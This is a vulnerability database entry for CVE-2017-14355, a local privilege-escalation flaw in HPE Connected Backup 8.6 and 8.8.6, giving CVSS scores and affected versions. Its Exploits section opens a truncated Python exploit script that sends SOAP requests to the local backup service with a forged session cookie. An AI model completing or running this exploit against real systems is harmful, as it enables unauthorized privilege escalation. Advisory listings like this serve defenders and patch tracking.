7.2
CVSSv2

CVE-2017-14355

Published: 05/12/2017 Updated: 07/11/2023
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

A potential security vulnerability has been identified in HPE Connected Backup versions 8.6 and 8.8.6. The vulnerability could be exploited locally to allow escalation of privilege.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microfocus connected backup 8.6

microfocus connected backup 8.8.6

Exploits

#Tested on HP Connected Backup version 8820 on Windows 7 x64 import os import sys import time import requests from bs4 import BeautifulSoup def send_request(body): url="localhost:16386/" headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"} response = requestspost ...